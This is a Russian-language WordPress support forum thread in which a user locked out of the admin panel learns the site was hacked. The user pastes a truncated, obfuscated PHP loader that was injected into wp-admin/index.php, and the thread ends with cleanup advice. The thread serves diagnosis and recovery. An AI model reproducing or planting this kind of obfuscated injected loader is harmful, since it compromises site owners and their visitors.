Поддержка Проблемы и решения После обновления WP до 6 нет доступ в админку

  • Посмотрел различные решения.
    Ни плагины ни тема не виноваты, в логах админки следующая запись:

    [09-Jun-2022 10:27:03 Europe/Kiev] PHP Warning:  require(/home/std31/public_html/wp-admin/wp-blog-header.php): failed to open stream: No such file or directory in /home/std31/public_html/wp-admin/index.php on line 6
    [09-Jun-2022 10:27:03 Europe/Kiev] PHP Fatal error:  require(): Failed opening required '/home/std31/public_html/wp-admin/wp-blog-header.php' (include_path='.:/opt/alt/php74/usr/share/pear') in /home/std31/public_html/wp-admin/index.php on line 6

    Файлы в голове public_html присутствуют.

    • Тема изменена 5 месяцев, 3 недели назад пользователем std31.

    Страница, с которой нужна помощь: [войдите, чтобы увидеть ссылку]

Просмотр 8 ответов — с 1 по 8 (всего 8)
  • Модератор Sergey Biryukov

    (@sergeybiryukov)

    Live and Learn

    Failed opening required ‘wp-admin/wp-blog-header.php’

    wp-admin/index.php on line 6

    Похоже, что сайт взломан:

    • В WordPress нет файла wp-admin/wp-blog-header.php, он есть только в корневом каталоге.
    • Ни в wp-admin/index.php ни в index.php в строке 6 нет подключения файла wp-blog-header.php.

    Сергей, Спасибо за рекомендации

    Скачал wordpress 6 с оф сайта, распаковал и взял из папки ..\wp-admin\index.php и заменил его на сервере. И обнаружил, что содержимое файла превратилось вот в это

    <?php
    $OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%7
    
    ТУТ ДОВОЛЬНО МНОГО ЭТОЙ ФИГНИ 
    
    ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x4f\x30"]($O_00__O0OO);die();}$O00_O_OO0_=OOO0O_0_0_($O_00__O0OO);if($O00_O_OO0_!==false){foreach($O00_O_OO0_["\x68\x65\x61\x64\x65\x72\x73"] as $OO0_O_O00_){@header($OO0_O_O00_);}echo $O00_O_OO0_["\x64\x61\x74\x61"];die();}}OO00O0O___($O0O_0_O0_O);
    ?>
    <?php
    define( 'WP_USE_THEMES', true );
    require __DIR__ . '/wp-blog-header.php';

    Так ведь не должно быть?
    Наверное буду следовать совету из статьи если вас взломали.

    • Ответ изменён 5 месяцев, 3 недели назад пользователем std31.
    • Ответ изменён 5 месяцев, 3 недели назад пользователем std31.

    Скачал сайт на локальный сервер (open server)
    Импортировал бд с сайта в локальную бд
    внес изменения в таблицу wp_options.php
    -поменял URL

    внес изменения в файл wp_config.php
    -Имя базы данных для WordPress
    -Имя пользователя базы данных root
    -пустой пароль бд
    таблице wp-users
    -поменял пароль у админа (свойство поля md5 ставил)

    В админку я теперь захожу, но в ней только текстовая версия без оформления, и у меня нет прав доступа что либо изменить.
    пишет

    >Доступ запрещён!
    >У Вас нет прав доступа к этому объекту. Файл недоступен для чтения, или сервер не >может его прочитать.
    >Error 403

    плагины отключал
    темы отключал
    и то и другое вместе отключал не помогло
    .htaccess отключал, заменял на новый от wordpress 6 версии

    Что делать, куда копать?

    • Ответ изменён 5 месяцев, 3 недели назад пользователем std31.
    • Ответ изменён 5 месяцев, 3 недели назад пользователем std31.
    • Ответ изменён 5 месяцев, 3 недели назад пользователем std31.
    Anonymous User 17160716

    (@anonymized-17160716)

    std31, привет.

    Что делать, куда копать?

    Вы выбрали путь боли и страданий, поднимая явно скомпрометированный сайт на локальном сервере, не говоря о том, что это просто небезопасно, если вы не имеете опыта работы с такими случаями.

    В админку я теперь захожу, но в ней только текстовая версия без оформления, и у меня нет прав доступа что либо изменить.

    Очевидно, пробелма с правами доступа к файлам и директориям. Тут, конечно, можно посоветовать это всё восстановить, чтобы заработало «как надо», но не совсем ясна ваша итоговая цель. Вы это делаете на локалхосте для чего?

    Привет m0ze,

    Я хочу получить доступ к своим данным и сохранить статьи блога.
    Получить права admin

    Подумал раз проблемы с правами доступа, то уж на локальном сервере я смогу до них добраться.
    А еще решил не экспериментировать на работающем сайте. Изменить я на нем ничего не могу, но он хотя бы работает.

    >Очевидно, проблема с правами доступа к файлам и директориям.
    Посмотрел на права директории wp_admin 755
    файлы внутри 644
    У всех директорий и файлов таки права
    кроме public_html\index.php у него 444

    m0ze, вы оказываете платные консультации?

    Модератор Yui

    (@fierevere)

    ゆい

    с предложениями фриланса, платных консультаций и прочего внефорумного — в раздел «Специалисты»
    во всех других разделах это считается нарушением правил форума.

    Anonymous User 17160716

    (@anonymized-17160716)

    std31,

    Я хочу получить доступ к своим данным и сохранить статьи блога.
    Получить права admin

    Если вы владелец сайта, то, по логике вещей, у вас аккаунт администратора должен быть. Я что-то упустил? Из ранее написанного я понял, что у вас проблема именно с вредоносным кодом, который мешает/блокирует штатную работу сайта, но не с аккаунтом администратора.

    Подумал раз проблемы с правами доступа, то уж на локальном сервере я смогу до них добраться.

    Опять же, из выше описанного (скорее всего) проблема с правами у вас на локальном сервере.

    m0ze, вы оказываете платные консультации?

    Да, и сайты восстанавливаю после взлома, но если нужен обмен контактами, то это делается в разделе «Поиск специалистов».

    С проблемой разобрался.
    сайт был взломан через плагин из непроверенного источника.
    Был установлен доп плагин, который шифровал index.php админки и другие файлы, блокировал пользователя admin для внесения каких либо изменений.

    Вариант лечения, скачать все файлы на локальном сервере чистить от вредоносного кода.

    Спасибо всем кто откликнулся. 🤝

Просмотр 8 ответов — с 1 по 8 (всего 8)